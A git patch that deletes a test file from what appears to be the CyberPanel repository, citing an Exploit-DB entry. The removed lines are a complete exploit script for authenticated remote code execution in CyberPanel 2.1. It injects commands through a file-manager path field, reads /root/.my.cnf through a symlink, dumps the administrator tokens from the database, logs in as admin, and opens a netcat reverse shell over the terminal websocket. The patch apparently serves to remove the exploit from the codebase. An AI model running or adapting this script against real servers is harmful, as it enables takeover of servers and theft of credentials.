2021 19:48:14 +0500 Subject: [PATCH 4/4] resolve https://www.exploit-db.com/exploits/50230 --- plogical/test.py | 233 ----------------------------------------------- 1 file changed, 233 deletions(-) diff --git a/plogical/test.py b/plogical/test.py index 88ad1362c..e69de29bb 100644 --- a/plogical/test.py +++ b/plogical/test.py @@ -1,233 +0,0 @@ -# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated) -# Date: 27.08.2021 -# Author: Numan Türle -# Vendor Homepage: https://cyberpanel.net/ -# Software Link: https://github.com/usmannasir/cyberpanel -# Version: <=2.1 -# https://www.youtube.com/watch?v=J_8iLELVgkE - - -# !/usr/bin/python3 -# -*- coding: utf-8 -*- -# CyberPanel - Remote Code Execution (Authenticated) -# author: twitter.com/numanturle -# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE] -# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password - - -import argparse, requests, warnings, json, re, base64, websocket, ssl, _thread, time -from requests.packages.urllib3.exceptions import InsecureRequestWarning -from cmd import Cmd - -warnings.simplefilter('ignore', InsecureRequestWarning) - - -def init(): - parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution') - parser.add_argument('-u', '--host', help='Host', type=str, required=True) - parser.add_argument('-l', '--login', help='Username', type=str, required=True) - parser.add_argument('-p', '--password', help='Password', type=str, required=True) - parser.add_argument('-f', '--file', help='File', type=str) - args = parser.parse_args() - exploit(args) - - -def exploit(args): - def on_open(ws): - verifyPath, socket_password - print("[+] Socket connection successful") - print("[+] Trying a reverse connection") - ws.send(json.dumps({"tp": "init", "data": {"verifyPath": verifyPath, "password": socket_password}})) - ws.send(json.dumps( - {"tp": "client", "data": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r", - "verifyPath": verifyPath, "password": socket_password})) - ws.close() - - def on_close(ws, close_status_code, close_msg): - print("[+] Successful") - print("[!] Disconnect from socket") - - session = requests.Session() - target = "https://{}:8090".format(args.host) - username = args.login - password = args.password - - print("[+] Target {}".format(target)) - - response = session.get(target, verify=False) - session_hand = session.cookies.get_dict() - token = session_hand["csrftoken"] - - print("[+] Token {}".format(token)) - - headers = { - 'X-Csrftoken': token, - 'Cookie': 'csrftoken={}'.format(token), - 'Referer': target - } - - login = session.post(target + "/verifyLogin", headers=headers, verify=False, - json={"username": username, "password": password, "languageSelection": "english"}) - login_json = json.loads(login.content) - - if login_json["loginStatus"]: - session_hand_login = session.cookies.get_dict() - - print("[+] Login Success") - print("[+] Send request fetch websites list") - - headers = { - 'X-Csrftoken': session_hand_login["csrftoken"], - 'Cookie': 'csrftoken={};sessionid={}'.format(token, session_hand_login["sessionid"]), - 'Referer': target - } - - feth_weblist = session.post(target + "/websites/fetchWebsitesList", headers=headers, verify=False, - json={"page": 1, "recordsToShow": 10}) - feth_weblist_json = json.loads(feth_weblist.content) - - if feth_weblist_json["data"]: - - weblist_json = json.loads(feth_weblist_json["data"]) - domain = weblist_json[0]["domain"] - domain_folder = "/home/{}".format(domain) - - print("[+] Successfully {} selected".format(domain)) - print("[+] Creating ssh pub") - - remove_ssh_folder = session.post(target + "/filemanager/controller", headers=headers, verify=False, - json={"path": domain_folder, "method": "deleteFolderOrFile", - "fileAndFolders": [".ssh"], "domainRandomSeed": "", - "domainName": domain, "skipTrash": 1}) - create_ssh = session.post(target + "/websites/fetchFolderDetails", headers=headers, verify=False, - json={"domain": domain, "folder": "{}".format(domain_folder)}) - create_ssh_json = json.loads(create_ssh.content) - - if create_ssh_json["status"]: - key = create_ssh_json["deploymentKey"] - - print("[+] Key : {}".format(key)) - - explode_key = key.split() - explode_username = explode_key[-1].split("@") - - if explode_username[0]: - username = explode_username[0] - hostname = explode_username[1] - - print("[+] {} username selected".format(username)) - print("[+] Preparing for symlink attack") - print("[+] Attempting symlink attack with user-level command execution vulnerability #1") - - target_file = args.file - if not target_file: - target_file = "/root/.my.cnf" - domain_folder_ssh = "{}/.ssh".format(domain_folder) - command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh, username, target_file, - domain_folder_ssh, username) - - completeStartingPath = "{}';{};'".format(domain_folder, command) - print('complete starting path: %s' % completeStartingPath) - time.sleep(5) - # filemanager/controller - completeStartingPath - command execution vulnerability - - symlink = session.post(target + "/filemanager/controller", headers=headers, verify=False, - json={"completeStartingPath": completeStartingPath, "method": "listForTable", - "home": domain_folder, "domainRandomSeed": "", "domainName": domain}) - symlink_json = json.loads(symlink.content) - - if symlink_json["status"]: - print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file)) - - read_file = session.post(target + "/websites/fetchFolderDetails", headers=headers, verify=False, - json={"domain": domain, "folder": "{}".format(domain_folder)}) - read_file_json = json.loads(read_file.content) - read_file = read_file_json["deploymentKey"] - if not args.file: - print("-----------------------------------") - print(read_file.strip()) - print("-----------------------------------") - - mysql_password = re.findall('password=\"(.*?)\"', read_file)[0] - steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format( - mysql_password, domain_folder) - - print("[+] Fetching users tokens") - - completeStartingPath = "{}';{}".format(domain_folder, steal_token) - steal_token_request = session.post(target + "/filemanager/controller", headers=headers, - verify=False, - json={"completeStartingPath": completeStartingPath, - "method": "listForTable", "home": domain_folder, - "domainRandomSeed": "", "domainName": domain}) - token_file = domain_folder + "/token.txt" - steal_token_read_request = session.post(target + "/filemanager/controller", headers=headers, - verify=False, json={"fileName": token_file, - "method": "readFileContents", - "domainRandomSeed": "", - "domainName": domain}) - leak = json.loads(steal_token_read_request.content) - leak = leak["fileContents"].replace("Basic ", "").strip().split("\n")[1:] - print("------------------------------") - for user in leak: - b64de = base64.b64decode(user).decode('utf-8') - exp_username = b64de.split(":") - if exp_username[0] == "admin": - admin_password = exp_username[1] - print("[+] " + b64de) - print("------------------------------") - print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~") - print("[+] Try login admin") - - headers = { - 'X-Csrftoken': token, - 'Cookie': 'csrftoken={}'.format(token), - 'Referer': target - } - login_admin = session.post(target + "/verifyLogin", headers=headers, verify=False, - json={"username": "admin", "password": admin_password, - "languageSelection": "english"}) - login_json = json.loads(login_admin.content) - if login_json["loginStatus"]: - session_hand_login = session.cookies.get_dict() - - print("[+] 4dm1n_l061n_5ucc355") - print("[+] c0nn3c71n6_70_73rm1n4l") - headers = { - 'X-Csrftoken': session_hand_login["csrftoken"], - 'Cookie': 'csrftoken={};sessionid={}'.format(token, - session_hand_login["sessionid"]), - 'Referer': target - } - - get_websocket_token = session.get(target + "/Terminal", headers=headers, verify=False) - verifyPath = \ - re.findall('id=\"verifyPath\">(.*?)', str(get_websocket_token.content))[-1] - socket_password = \ - re.findall('id=\"password\">(.*?)', str(get_websocket_token.content))[-1] - print("[+] verifyPath {}".format(verifyPath)) - print("[+] socketPassword {}".format(socket_password)) - print("[+] Trying to connect to socket") - ws = websocket.WebSocketApp("wss://{}:5678".format(args.host), - on_open=on_open, - on_close=on_close) - ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE}) - - else: - print("[-] Auto admin login failed") - else: - print(read_file) - else: - print("[-] Unexpected") - else: - print("[-] Username selected failed") - else: - print("[-] Fail ssh pub") - else: - print("[-] List error") - else: - print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"])) - - -if __name__ == "__main__": - init() \ No newline at end of file